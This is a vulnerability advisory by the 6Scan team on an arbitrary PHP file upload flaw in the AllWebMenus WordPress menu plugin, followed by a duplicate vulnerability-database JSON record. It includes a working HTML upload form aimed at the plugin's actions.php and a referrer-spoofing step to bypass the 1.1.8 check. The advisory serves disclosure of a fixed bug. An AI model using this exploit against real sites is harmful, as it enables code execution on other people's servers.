#Exploit Title: AllWebMenus WordPress Menu Plugin Arbitrary file upload
#Version: < 1.1.9
#Date: 2012-01-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/
#Official fix: This advisory is released after the vendor was contacted and fixed the issue promptly.
#Description: Unauthorized users could upload arbitrary files to the vulnerable server, potentially executing commands
AllWebMenus WordPress Menu Plugin
<1.1.8 Remote File upload
On versions < 1.1.8 , lack of checks in script actions.php allowed malicious user to upload any file to the vulnerable server.
Create a file (For example, Wordpress_security.php , with this content <?php echo '6Scan to the rescue'; ?> )
Compress it with zip to awm.zip
Use this form to upload the php file to the server
<form action="http://192.168.0.197/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php" method=post enctype="multipart/form-data">
<input type="file" name="awm1" size=100>
<input type="hidden" name="AWM_menu_id" value="2134234">
<input type="hidden" name="theaction" value="zip_update">
<input type=submit>
</form>
Version 1.1.8 also checks the source referrer, so you have to use scripting language (or spoof it in another way) to set the HTTP_REFERER to
"wp-admin/options-general.php?page=allwebmenus-wordpress-menu-plugin/allwebmenus-wordpress-menu.php"
{"id": "SECURITYVULNS:DOC:27667", "bulletinFamily": "software", "title": "AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary file upload", "description": "#Exploit Title: AllWebMenus WordPress Menu Plugin Arbitrary file upload\r\n#Version: < 1.1.9\r\n#Date: 2012-01-19\r\n#Author: 6Scan (http://6scan.com) security team\r\n#Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/\r\n#Official fix: This advisory is released after the vendor was contacted and fixed the issue promptly.\r\n#Description: Unauthorized users could upload arbitrary files to the vulnerable server, potentially executing commands\r\n\r\nAllWebMenus WordPress Menu Plugin\r\n<1.1.8 Remote File upload\r\n\r\nOn versions < 1.1.8 , lack of checks in script actions.php allowed malicious user to upload any file to the vulnerable server.\r\nCreate a file (For example, Wordpress_security.php , with this content <?php echo '6Scan to the rescue'; ?> )\r\nCompress it with zip to awm.zip\r\n\r\nUse this form to upload the php file to the server\r\n\r\n<form action="http://192.168.0.197/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php" method=post enctype="multipart/form-data">\r\n<input type="file" name="awm1" size=100>\r\n<input type="hidden" name="AWM_menu_id" value="2134234">\r\n<input type="hidden" name="theaction" value="zip_update">\r\n<input type=submit>\r\n</form>\r\n\r\n\r\nVersion 1.1.8 also checks the source referrer, so you have to use scripting language (or spoof it in another way) to set the HTTP_REFERER to \r\n"wp-admin/options-general.php?page=allwebmenus-wordpress-menu-plugin/allwebmenus-wordpress-menu.php"\r\n", "published": "2012-02-13T00:00:00", "modified": "2012-02-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27667", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 30, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12182"]}]}, "exploitation": null, "vulnersScore": -0.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659730939}}